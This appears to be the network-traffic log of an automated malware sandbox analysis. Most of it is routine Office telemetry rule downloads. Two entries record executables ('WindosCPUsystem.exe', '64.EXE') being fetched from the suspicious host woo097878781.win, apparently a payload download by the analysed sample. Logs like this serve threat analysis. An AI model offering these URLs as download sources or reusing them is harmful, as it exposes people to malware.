Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: woo097878781.win
Source: global traffic	HTTP traffic detected: GET /64.EXE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: woo097878781.win
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
